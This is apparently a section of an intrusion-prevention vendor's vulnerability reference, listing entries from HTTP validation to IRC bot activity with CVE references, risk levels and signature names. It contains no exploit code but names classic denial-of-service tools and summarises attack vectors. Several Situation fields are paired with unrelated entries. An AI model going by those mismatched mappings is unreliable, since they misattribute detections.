Type:	Input Validation
Description:	HTTP Basic Authentication utilizes MIME-Base64 encoding to pass the authorization data. Non-compliant characters may indicate an attack or probing attempt against the web-server.
Situation:	HTTP_CSH-Invalid-Basic-Authentication-Base64

Invalid-HTTP-Response

About this vulnerability:	An invalid HTTP response
Risk:	Low
First detected in:	sgpkg-ips-427-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An invalid HTTP response may contain extra characters after the end of the headers or the content-length may have been missing from a response that contains payload. This may be caused by a misconfigured or malfunctioning HTTP server.
Situation:	HTTP_SHS-HTTP-0.9-Response HTTP_SHS-Invalid-Response-HTTP-1.1 HTTP_SHS-Invalid-Response-HTTP-1.0

Invensys-Wonderware-SCADA-ActiveX-Buffer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Invensys Wonderware

Risk:

Moderate

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Invensys Wonderware

Type:

Buffer Overflow

Description:

Stack-based buffer overflow in the IConfigurationAccess interface in the Invensys Wonderware Archestra ConfigurationAccessComponent ActiveX control in Wonderware Application Server (WAS) before 3.1 SP2 P01, as used in the Wonderware Archestra Integrated Development Environment (IDE) and the InFusion Integrated Engineering Environment (IEE), allows remote attackers to execute arbitrary code via the first argument to the UnsubscribeData method.

Situation:

File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerability-2
File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerabilities

References:

CVE-2010-2974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2974

Invisible-Inline-Frame

About this vulnerability:	Sizeless inline frame (IFRAME) in HTML document
Risk:	Moderate
First detected in:	sgpkg-ips-111-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic browser
Type:	Malfunction
Description:	Hypertext Markup Language (HTML) contains an inline frame feature. This feature can be used to include other pages in the current page. It is also possible to set the inline frame size to zero, which effectively means that the frame is not visible. This kind of frames are often used to gather statistics and load external scripts. However, the invisible frame is also commonly used to track users and download malware.
Situation:	HTTP_Invisible-Inline-Frame File-Text_Invisible-Inline-Frame

Invision-Power-Board-Index-Php-SQL-Injection

About this vulnerability:

SQL injection vulnerability in Invision Power Board

Risk:

Low

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Invision Power Board

Type:

SQL Injection

Description:

Invision Power Board has an SQL injection vulnerability. A remote attacker can send a specially crafted HTTP request to the vulnerable index.php script containing an sql query and obtain sensitive information.

References:

CVE-2004-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1531

BID-11703
http://www.securityfocus.com/bid/11703

OSVDB-11929
http://www.osvdb.org/11929

Invision-Power-Board-PHP-Remote-Code-Execution

About this vulnerability:

A PHP remote code execution vulnerability in Invision Power Board

Risk:

High

First detected in:

sgpkg-ips-660-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Invision Power Board

Type:

PHP Injection

Description:

A PHP unserialize() vulnerability in Invision Power Board, 3.3.4 and earlier, that allows remote attackers to write arbitrary PHP code to a file on the Invision IP.Board web directory, and execute remote code under the context of the webserver user.

Situation:

HTTP_CS-Invision-Power-Board-PHP-Remote-Code-Execution

References:

CVE-2012-5692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5692

BID-56288
http://www.securityfocus.com/bid/56288

OSVDB-86702
http://www.osvdb.org/86702

Invisionix-IRSR-Remote-PHP-Inclusion

About this vulnerability:

A remote code execution vulnerability in Invisionix IRSR

Risk:

High

First detected in:

sgpkg-ips-786-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Invisionix

Type:

Input Validation

Description:

There exists a remote PHP inclusion vulnerability in Invisionix IRSR version 0.2 and earlier.

Situation:

HTTP_CRL-Invisionix-IRSR

References:

CVE-2006-4237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4237

InvokeAI-RCE

About this vulnerability:

A vulnerability in InvokeAI

Risk:

High

First detected in:

sgpkg-ips-1842-5242

Last changed:

sgpkg-ips-1842-5242

Platform:

Linux

Software:

InvokeAI

Type:

Input Validation

Description:

A vulnerability in InvokeAI which allows remote attackers to embed malicious code in model file and supply the model URL to the server via /api/v2/models/install, which the server will then download and load without proper validation.

Situation:

File-Text_InvokeAI-RCE

References:

CVE-2024-12029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12029

IOServer-Directory-Traversal

About this vulnerability:	A vulnerability in IOServer
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IOServer
Type:	Malfunction
Description:	There is a directory traversal vulnerability in IOServer. Successful exploitation by a remote attacker could result in the disclosure of any system file.
Situation:	HTTP_CSU-IOServer-Directory-Traversal

IOServer-OPC-Server-DoS

About this vulnerability:	A vulnerability in IOServer OPC Server
Risk:	Moderate
First detected in:	sgpkg-ips-610-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IOServer
Type:	Malfunction
Description:	There is a denial of service vulnerability in IOServer OPC Server
Situation:	Generic_CS-IOServer-OPC-Server-DoS

IP-Address-As-HTTP-Host

About this vulnerability:	IP address as HTTP host
Risk:	Moderate
First detected in:	sgpkg-ips-446-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An IP address was used as the host in an HTTP request
Situation:	HTTP_CSH-IP-Address-As-HTTP-Host

IP-Bonk-IP-Fragmentation-Denial-Of-Service

About this vulnerability:

Bonk variation of teardrop IP fragmentation denial of service

Risk:

Low

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in the IP defragmentation routines of certain IP stacks. A remote attacker may exploit this by sending crafted IP fragments. A successful exploit leads to a Denial of Service condition. This vulnerability can be exploited, for example, with tools called "bonk", "boink" and "targa".

Situation:

DOS_BONK

References:

CVE-1999-0258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0258

OSVDB-5730
http://www.osvdb.org/5730

IP-Cisco-Malformed-Packet-IP-Phone-Crash

About this vulnerability:

Some versions of Cisco IP phones crash when receiving malformed IP packets

Risk:

Low

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco

Software:

Cisco IP Phone

Type:

Malfunction

Description:

Cisco IP Phone (VoIP) models 7910, 7940, and 7960 allow remote attackers to cause a denial of service via malformed packets. The following attack tools are known to cause the denial of service: (1) "jolt", (2) "jolt2", (3) "raped", (4) "hping2", (5) "bloop", (6) "bubonic", (7) "mutant", (8) "trash", and (9) "trash2. Other attack tools may also cause a denial of service.

Situation:

DOS_JOLT

References:

CVE-2002-0880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0880

IP-ICMP-1234.c-DoS

About this vulnerability:	TCP/IP ICMP fragmentation flaw
Risk:	Moderate
First detected in:	sgpkg-ips-253-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	Certain TCP/IP stacks are vulnerable to 1234.c fragmentation attacks. A successful attack causes the target machine to halt, making it inoperable.
Situation:	DOS_1234

IP-Land-DoS

About this vulnerability:

Land Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-214-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-2005-0688, CVE-2005-1649, CVE-2005-4215, CVE-2005-4257, CVE-2005-4258 , CVE-2005-4275 CVE-2005-4276

Situation:

References:

CVE-1999-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0016

BID-2666
http://www.securityfocus.com/bid/2666

IP-Land-DoS-Cisco-Catalyst

About this vulnerability:

Land Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4215, CVE-2005-4257, CVE-2005-4275 CVE-2005-4276

Situation:

References:

CVE-2005-4258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4258

BID-15861
http://www.securityfocus.com/bid/15861

IP-Land-DoS-Linksys

About this vulnerability:

Land Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4258 , CVE-2005-4275 CVE-2005-4276

Situation:

References:

CVE-2005-4257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4257

BID-15861
http://www.securityfocus.com/bid/15861

IP-Land-DoS-Motorola

About this vulnerability:

Land Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4257, CVE-2005-4258 , CVE-2005-4275 CVE-2005-4276

Situation:

References:

CVE-2005-4215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4215

BID-15795
http://www.securityfocus.com/bid/15795

IP-Land-DoS-Scientific-Atlanta-Cable-Modem

About this vulnerability:

Land Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4215, CVE-2005-4257, CVE-2005-4258 CVE-2005-4276

Situation:

References:

CVE-2005-4275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4275

BID-15870
http://www.securityfocus.com/bid/15870

IP-Land-DoS-Westell-Versalink

About this vulnerability:

Land Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-1649, CVE-2005-4215, CVE-2005-4257, CVE-2005-4258 CVE-2005-4275

Situation:

HTTP_CRL-IPFire-Firewall-Web-Interface-Backup-Cgi-Command-Injection

References:

CVE-2005-4276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4276

BID-15869
http://www.securityfocus.com/bid/15869

IP-Nestea-IP-Fragmentation-Denial-Of-Service

About this vulnerability:

Nestea variation of teardrop IP fragmentation denial of service

Risk:

Low

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Software:

<os>

Type:

Malfunction

Description:

Situation:

DOS_NESTEA

References:

CVE-1999-0257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0257

OSVDB-5729
http://www.osvdb.org/5729

IP-Newtear-IP-Fragmentation-Denial-Of-Service

About this vulnerability:	Newtear variation of teardrop IP fragmentation denial of service
Risk:	Low
First detected in:	sgpkg-ips-253-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	-
Software:	<os>
Type:	Malfunction
Description:	There is a vulnerability in the IP defragmentation routines of certain IP stacks. A remote attacker may exploit this by sending crafted UDP fragments. A successful exploit leads to a Denial of Service condition. This vulnerability can be exploited, for example, with tools called "newtear" and "targa".
Situation:	DOS_NEWTEAR

IP-Oshare-Bogus-IP-Fragmentation-DoS

About this vulnerability:

Malformed IP fragmentation denial of service

Risk:

Low

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in the IP defragmentation routines of certain IP stacks. A remote attacker may exploit this by sending crafted IP fragments. A successful exploit leads to a Denial of Service condition. This vulnerability can be exploited with tool called "oshare". Unlike many other fragmentation vullnerabilities, this vulnerability cannot be exploited beyond routers. For this reason, it is a local network vulnerability only.

Situation:

DOS_OSHARE

References:

CVE-1999-0357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0357

IP-Teardrop-DoS

About this vulnerability:

Teardrop Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

Teardrop exploits a vulnerability in TCP/IP stack implementations. By sending a fragmented IP packet with overlapping fragments, remote attackers can launch a denial-of-service attack.

Situation:

DOS_TEARDROP

References:

CVE-1999-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0015

BID-124
http://www.securityfocus.com/bid/124

IP-UDP-Saihyousen-Denial-Of-Service

About this vulnerability:	Saihyousen Oversized UDP Denial Of Service
Risk:	Low
First detected in:	sgpkg-ips-253-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	-
Software:	<os>
Type:	Malfunction
Description:	Some operating systems have a vulnerability in their IP stacks that causes an oversized UDP packet to crash the system. This vulnerability can be exploited, for example, by tools called "conseal", "saihyousen" and "targa".
Situation:	DOS_SAIHYOUSEN

IPFire-Firewall-Web-Interface-Backup-Cgi-Command-Injection

About this vulnerability:

A vulnerability in IPFire Team IPFire

Risk:

Moderate

First detected in:

sgpkg-ips-1120-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IPFire

Type:

Input Validation

Description:

Improper validation of user-supplied requests in the backup.cgi script causes a command injection vulnerability in the IPFire firewall. A successful exploit allows an attacker to run arbitrary commands on the target system as the nobody user.

Situation:

References:

CVE-2018-16232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16232

IPFire-Pakfire.cgi-Authenticated-RCE

About this vulnerability:

A vulnerability in IPFire.

Risk:

High

First detected in:

sgpkg-ips-1365-5242

Last changed:

sgpkg-ips-1365-5242

Platform:

Generic

Software:

IPFire

Type:

Input Validation

Description:

A vulnerability in IPFire, versions 2.25 Core Update 156 and before, which allows remote attackers to execute arbitrary code by allowing non-root users to modify backup.pl through /cgi-bin/pakfire.cgi.

Situation:

HTTP_CRL-IPFire-Pakfire.cgi-Authenticated-RCE

References:

CVE-2021-33393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33393

IPFire-Proxy.cgi-RCE

About this vulnerability:	An IPFire proxy.cgi RCE vulnerability
Risk:	High
First detected in:	sgpkg-ips-1020-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	IPFire
Type:	Input Validation
Description:	A vulnerability in IPFire, versions before 2.19 Update Core 110, which allows remote attackers to execute arbitrary code through the OINKCODE parameter in the ids.cgi page.
Situation:	HTTP_CRL-IPFire-Proxy.cgi-RCE

IPFire-Proxy.cgi-Remote-Code-Execution

About this vulnerability:	A vulnerability in IPFire
Risk:	High
First detected in:	sgpkg-ips-809-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IPFire
Type:	Input Validation
Description:	There exists a remote code execution vulnerability in IPFire.
Situation:	HTTP_CRL-IPFire-Proxy.cgi-Remote-Code-Execution

Ipswitch-IMail-IMAP-Server-Delete-Command-BOF

About this vulnerability:

Buffer overflow in Ipswitch IMail IMAP server

Risk:

High

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

Ipswitch IMail Server is vulnerable to a stack-based buffer overflow caused by improper bounds checking of user-supplied input in the DELETE command. A remote attacker could use this vulnerability to overflow a buffer and possibly execute arbitrary code on the system.

Situation:

IMAP_Excessively-Long-Argument-In-IMAP-Delete-Command-BOF
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Delete-Command

References:

CVE-2004-1520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1520

BID-11675
http://www.securityfocus.com/bid/11675

OSVDB-11838
http://www.osvdb.org/11838

Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF

About this vulnerability:

Remote buffer overflow vulnerability in the Ipswitch LDAP daemon

Risk:

High

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

Ipswitch IMail Server is vulnerable to a buffer overflow in the Lightweight Directory Access Protocol (LDAP) daemon, caused by improper bounds checking of user-supplied input. By supplying a specially-crafted LDAP message containing a large tag, a remote attacker could overflow a buffer to cause the daemon to crash and execute arbitrary code on the system with administrative privileges.

Situation:

LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF-2
LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF-3
LDAP_Ipswitch-IMail-LDAP-Daemon-DoS
LDAP_Ipswitch-IMail-LDAP-Daemon-Probe

References:

CVE-2004-0297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0297

BID-9682
http://www.securityfocus.com/bid/9682

OSVDB-3984
http://www.osvdb.org/3984

Ipswitch-IMail-List-Mailer-Reply-To-Address-Buffer-Overflow

About this vulnerability:

A vulnerability in Ipswitch IMail Server

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IMail

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Ipswitch IMail Server.

Situation:

SMTP_CS-Ipswitch-IMail-List-Mailer-Reply-To-Address-Buffer-Overflow

References:

BID-41717
http://www.securityfocus.com/bid/41717

Ipswitch-IMail-Server-Imailsec.dll-Heap-Buffer-Overflow

About this vulnerability:	A buffer overflow vulnerability in Ipswitch IMail
Risk:	High
First detected in:	sgpkg-ips-130-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IMail
Type:	Buffer Overflow
Description:	There is a heap overflow vulnerability in Ipswitch IMail Server's IMAP component. The vulnerability is due to a lack of boundary protection within the Imailsec.dll library while processing the IMAP LOGIN command. A remote unauthenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, normally System.
Situation:	IMAP_CS-Ipswitch-IMail-Server-Imailsec.dll-Heap-Buffer-Overflow

Ipswitch-IMail-Server-IMAP-Examine-BOF

About this vulnerability:

Buffer overflow in Ipswitch IMail server IMAP EXAMINE command

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ipswitch Collaboration Suite; IMail

Type:

Buffer Overflow

Description:

Ipswitch Collaboration Suite (ICS) IMail server contains a buffer overflow vulnerability in the IMAP EXAMINE command handling due to insufficient bounds checking of user supplied data. A remote attacker could create an overly long EXAMINE request to overflow a buffer, thus causing a denial of service and execute arbitrary code on the server.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command

References:

CVE-2005-0707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0707

BID-12780
http://www.securityfocus.com/bid/12780

OSVDB-14657
http://www.osvdb.org/14657

Ipswitch-IMail-Server-Mailing-List-Message-Subject-BOF

About this vulnerability:	An attempt to exploit vulnerability in Ipswitch iMail Server detected
Risk:	Moderate
First detected in:	sgpkg-ips-394-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IMail
Type:	Malfunction
Description:	There exists a buffer overflow vulnerability in Ipswitch IMail Server. The vulnerability is due a boundary error in the imailsrv.exe which handles messages sent to the imailsrv. The vulnerable code does not properly handle messages that are sent to certain mailing lists and have crafted "Subject" header.
Situation:	E-Mail_Ipswitch-IMail-Server-Mailing-List-Message-Subject-BOF

Ipswitch-IMail-SMTP-Server-Content-Type-Header-Buffer-Overflow

About this vulnerability:

Ipswitch Imail Content-Type Header Bof

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Malfunction

Description:

There exists a heap buffer overflow vulnerability in Ipswitch IMail SMTP Server. The vulnerability is due to insufficient boundary check when processing user provided data. Remote attackers could exploit this vulnerability by supplying a specially crafted Content-Type header to the server. Successful exploitation of this vulnerability allows remote attackers execute arbitrary code with the privileges of the affected application, which is normally System.

Situation:

E-Mail_Ipswitch-IMail-Server-Content-Type-BOF

References:

CVE-2007-5094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5094

BID-25762
http://www.securityfocus.com/bid/25762

OSVDB-39390
http://www.osvdb.org/39390

Ipswitch-IMail-StartTLS-Plaintext-Command-Injection

About this vulnerability:

A vulnerability in Ipswitch IMail Server

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IMail

Type:

Malfunction

Description:

A plain text command injection vulnerability exists in Ipswitch IMail Server.

Situation:

SMTP_CS-Ipswitch-IMail-StartTLS-Plaintext-Command-Injection

References:

CVE-2011-0411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0411

BID-46767
http://www.securityfocus.com/bid/46767

OSVDB-71021
http://www.osvdb.org/71021

Ipswitch-WhatsUp-Gold-HTTP-Request-DoS

About this vulnerability:

A vulnerability in Ipswitch Whatsp Gold

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ipswitch WhatsUp Gold

Type:

Input Validation

Description:

A vulnerability exists in the way the web server component of Ipswitch WhatsUp Gold processes a request that contains a special device name. An unhandled exception occurs when an HTTP request containing a reserved DOS device name is processed. An attacker exploiting this vulnerability can cause the web server component to terminate, causing a denial of service.

Situation:

HTTP_CSU-Ipswitch-WhatsUp-Gold-HTTP-Request-DoS

References:

CVE-2004-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0799

BID-11110
http://www.securityfocus.com/bid/11110

Ipswitch-WhatsUp-Gold-SNMP-Trap-Cross-Site-Scripting-CVE-2015-6005

About this vulnerability:

An attempt to exploit a vulnerability in IPSwitch WhatsUp Gold detected

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Ipswitch WhatsUp Gold

Type:

Input Validation

Description:

IPSwitch WhatsUp Gold before 16.4 allow remote attackers to inject arbitrary web script or HTML via (1) an SNMP OID object, (2) an SNMP trap message, (3) the View Names field, (4) the Group Names field, (5) the Flow Monitor Credentials field, (6) the Flow Monitor Threshold Name field, (7) the Task Library Name field, (8) the Task Library Description field, (9) the Policy Library Name field, (10) the Policy Library Description field, (11) the Template Library Name field, (12) the Template Library Description field, (13) the System Script Library Name field, (14) the System Script Library Description field, or (15) the CLI Settings Library Description field.

Situation:

TFTP_Ipswitch-WhatsUp-Gold-TFTP-Directory-Traversal

References:

CVE-2015-6005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6005

Ipswitch-WhatsUp-Gold-TFTP-Directory-Traversal

About this vulnerability:

An Ipswitch WhatsUp Gold TFTP Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ipswitch WhatsUp Gold

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Ipswitch WhatsUp Gold version 1.0.0.24 which allows remote attackers to upload or download arbitrary files.

Situation:

References:

CVE-2011-4722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4722

BID-50890
http://www.securityfocus.com/bid/50890

OSVDB-77455
http://www.osvdb.org/77455

Ipswitch-WS_FTP-Client-Format-String-Vulnerability

About this vulnerability:

A vulnerability in Ipswitch WS_FTP Home

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WS_FTP Home; WS_FTP Professional

Type:

Format String

Description:

A format string vulnerability exists in the Ipswitch WS_FTP client FTP product.

Situation:

FTP_SS-Ipswitch-WS_FTP-Client-Format-String-Vulnerability

References:

CVE-2008-3734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3734

BID-30720
http://www.securityfocus.com/bid/30720

Ipswitch-WS_FTP-Logging-Server-Daemon-Denial-Of-Service

About this vulnerability:

A vulnerability in IPSwitch WS_FTP Server

Risk:

High

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WS_FTP Server

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the way WS_FTP Logging Server Daemon handles WS_FTP logging requests. Remote unauthenticated attackers can exploit this vulnerability to cause a denial of service of an affected system. Upon a successful attack, the vulnerable WS_FTP logging server will terminate and exit, creating a denial of service condition. The service needs to be restarted manually to restore the functionality.

Situation:

Generic_UDP-Ipswitch-WS_FTP-Logging-Server-Daemon-Denial-Of-Service

References:

CVE-2007-3823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3823

OSVDB-36218
http://www.osvdb.org/36218

Ipswitch-WS_FTP-Server-Command-Buffer-Overflow

About this vulnerability:	A vulnerability in Ipswitch WS_FTP Server
Risk:	High
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WS_FTP Server
Type:	Buffer Overflow
Description:	A vulnerability exists in the way Ipswitch WS_FTP server parses FTP commands. Specially crafted arguments to certain FTP commands can trigger a buffer overflow. An attacker can exploit this vulnerability to create a denial of service condition or execute arbitrary code with system level privileges.
Situation:	FTP_CS-Ipswitch-WS_FTP-Server-Command-Buffer-Overflow

ipTime-G104BE-Router-Code-Execution

About this vulnerability:	A vulnerability in ipTime G104BE routers
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ipTime G104BE routers
Type:	Malfunction
Description:	There is a code execution vulnerability in ipTime G104BE routers which may allow a remote attacker to execute code on the router.
Situation:	HTTP_CSU-ipTime-G104BE-Router-Code-Execution

IPv6-Land-DoS

About this vulnerability:

Land Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A TCP SYN packet with the same source and destination addresses and the same source and destination ports may cause a denial of service. The vulnerability exists in multiple operating systems. A tool called "land.c" exploits this vulnerability, thus the vulnerability is often called as "land". See also CVE entries: CVE-1999-0016, CVE-2005-0688, CVE-2005-4215, CVE-2005-4257, CVE-2005-4258 , CVE-2005-4275 CVE-2005-4276

Situation:

IPv6_Extension-headers-incomplete

References:

CVE-2005-1649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1649

BID-13658
http://www.securityfocus.com/bid/13658

IPv6-Solaris-Malformed-Packet-DOS

About this vulnerability:

Malformed IPv6 cause Solaris to crash

Risk:

High

First detected in:

sgpkg-ips-203-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

<os>

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the way Sun Microsystems' Solaris handles IPv6 requests. The vulnerability is due to inappropriate calculation when processing malformed IPv6 requests. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted IPv6 packets to an affected system. Successful exploitation may cause the system to crash.

Situation:

References:

CVE-2009-0304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0304

BID-33435
http://www.securityfocus.com/bid/33435

IRC-Itlebot-Malware

About this vulnerability:	IRC Itlebot malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	IRC Itlebot is a Windows malware that can be controlled over IRC.
Situation:	Generic_CS-IRC-Itlebot-Activity

IRC-Network-Usage

About this vulnerability:	IRC network usage
Risk:	Moderate
First detected in:	sgpkg-ips-22-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic IRC client
Type:	Instant Messenger
Description:	The IRC network can be used to send messages and share files among users.
Situation:	IM-TCP_IRC-Server-Login IM-TCP_IRC-Server-Detected

IRC-Scan-Activity

About this vulnerability:	IRC SCAN Activity
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	There are various IRC-controlled bots that allow remote network scanning.
Situation:	Generic_CS-IRC-Scan-Activity Generic_SS-IRC-Scan-Activity

